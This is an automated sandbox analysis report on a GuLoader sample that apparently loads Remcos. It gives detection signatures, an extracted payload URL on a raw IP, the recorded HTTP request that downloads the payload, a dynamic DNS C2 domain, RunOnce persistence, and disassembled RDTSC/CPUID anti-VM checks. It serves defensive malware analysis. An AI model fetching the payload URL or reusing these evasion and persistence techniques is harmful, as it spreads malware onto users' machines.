Loading ...

Play interactive tourEdit tour

Windows Analysis Report JXblq0dqPN.exe

Overview

General Information

Sample Name:JXblq0dqPN.exe
Analysis ID:458740
MD5:8718d75b7cac53f13d01ddea9b52cee0
SHA1:2a37a01df74c887bb52eb2762d7d6ae0bd5e6b0b
SHA256:6f40242247db00eea1922d0c2a38337ddea49d9da02693679d2e4bfb19e6c088
Tags:exeGuLoader
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • JXblq0dqPN.exe (PID: 5988 cmdline: 'C:\Users\user\Desktop\JXblq0dqPN.exe' MD5: 8718D75B7CAC53F13D01DDEA9B52CEE0)
    • JXblq0dqPN.exe (PID: 4576 cmdline: 'C:\Users\user\Desktop\JXblq0dqPN.exe' MD5: 8718D75B7CAC53F13D01DDEA9B52CEE0)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exeReversingLabs: Detection: 17%
    Multi AV Scanner detection for submitted fileShow sources
    Source: JXblq0dqPN.exeVirustotal: Detection: 35%Perma Link
    Source: JXblq0dqPN.exeReversingLabs: Detection: 17%
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exeJoe Sandbox ML: detected
    Machine Learning detection for sampleShow sources
    Source: JXblq0dqPN.exeJoe Sandbox ML: detected
    Source: JXblq0dqPN.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
    Uses dynamic DNS servicesShow sources
    Source: unknownDNS query: name: wealthyrem.ddns.net
    Source: global trafficTCP traffic: 192.168.2.7:49746 -> 194.5.97.128:39200
    Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
    Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
    Source: global trafficHTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
    Source: global trafficHTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
    Source: unknownDNS traffic detected: queries for: clientconfig.passport.net
    Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmpString found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
    Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmpString found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

    Key, Mouse, Clipboard, Microphone and Screen Capturing:

    barindex
    Installs a global keyboard hookShow sources
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\JXblq0dqPN.exe
    Source: JXblq0dqPN.exe, 00000001.00000002.387805653.00000000007CA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02261C35 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226904A NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022658B5 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226483C NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264A0A NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264C62 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022646B5 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022642BF NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226473E NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02265983 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264BEB NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02268FFF NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264BC5 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02261C35
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267012
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022658B5
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022624E2
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022620EC
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226950D
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260557
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022685F4
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260BF8
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260223
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226483C
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264A0A
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264214
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264C62
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02266475
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260647
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260641
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226885F
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022646B5
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022614B3
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022642BF
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022626BA
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02263896
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267E98
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022628E2
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022680FC
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02265CD0
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02262D2C
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226473E
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260D0E
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260708
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226951E
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226111B
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02268764
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02263D6D
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267776
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260B71
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02262F7B
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02263147
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02262F54
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022615A5
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02263FA3
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267FAE
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02265D82
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226218A
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267BEC
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264BEB
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02264BC5
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022637C8
    Source: JXblq0dqPN.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: JXblq0dqPN.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: ANNONCEKAMPAGNE.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: ANNONCEKAMPAGNE.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: JXblq0dqPN.exe, 00000001.00000000.229744008.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
    Source: JXblq0dqPN.exe, 00000001.00000002.387697389.0000000000770000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs JXblq0dqPN.exe
    Source: JXblq0dqPN.exe, 00000011.00000002.1310162102.0000000002400000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs JXblq0dqPN.exe
    Source: JXblq0dqPN.exe, 00000011.00000000.386257006.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
    Source: JXblq0dqPN.exeBinary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
    Source: JXblq0dqPN.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@164/3
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DF27FD92C68F09D524.TMPJump to behavior
    Source: JXblq0dqPN.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: JXblq0dqPN.exeVirustotal: Detection: 35%
    Source: JXblq0dqPN.exeReversingLabs: Detection: 17%
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile read: C:\Users\user\Desktop\JXblq0dqPN.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_00401367 pushfd ; iretd
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_00403268 pushfd ; iretd
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_0226A0E4 push FFFFFFD2h; iretd
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 17_2_0056A0E4 push FFFFFFD2h; iretd
    Source: initial sampleStatic PE information: section name: .text entropy: 7.08584386702
    Source: initial sampleStatic PE information: section name: .text entropy: 7.08584386702
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile created: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exeJump to dropped file

    Boot Survival:

    barindex
    Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbsJump to behavior
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbsJump to behavior
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATEJump to behavior
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATEJump to behavior
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATEJump to behavior
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATEJump to behavior
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02261C35 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022685F4 LoadLibraryA,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02260BF8 TerminateProcess,LoadLibraryA,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022642BF NtWriteVirtualMemory,
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions:
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions:
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions:
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\ANNONCEKAMPAGNE.EXE\ROGUYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEOTATE
    Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\ANNONCEKAMPAGNE.EXE\ROGUYSET W = CREATEOBJECT("WSCRIPT.SHELL")
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions:
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 00000000022698AE second address: 0000000002269A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000002267E2C second address: 0000000002267E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions:
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000002264561 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov edx, dword ptr [ebp+0000027Ah] 0x00000009 push 64FFFEF9h 0x0000000e add dword ptr [esp], 9B136642h 0x00000015 xor dword ptr [esp], 8588ACC3h 0x0000001c xor dword ptr [esp], 859BC9F8h 0x00000023 cmp cx, cx 0x00000026 push dword ptr [ebp+50h] 0x00000029 call 00007F7648791C6Eh 0x0000002e call 00007F764878CCF5h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F764878CDD9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000002264936 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000000d mov eax, ebp 0x0000000f add eax, 0000010Ch 0x00000014 mov dword ptr [ebp+0000021Ch], edi 0x0000001a mov edi, eax 0x0000001c push edi 0x0000001d mov edi, dword ptr [ebp+0000021Ch] 0x00000023 push dword ptr [ebp+000000FCh] 0x00000029 call 00007F7648A653A9h 0x0000002e call 00007F7648A60805h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F7648A608E9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions:
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 00000000005698AE second address: 0000000000569A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
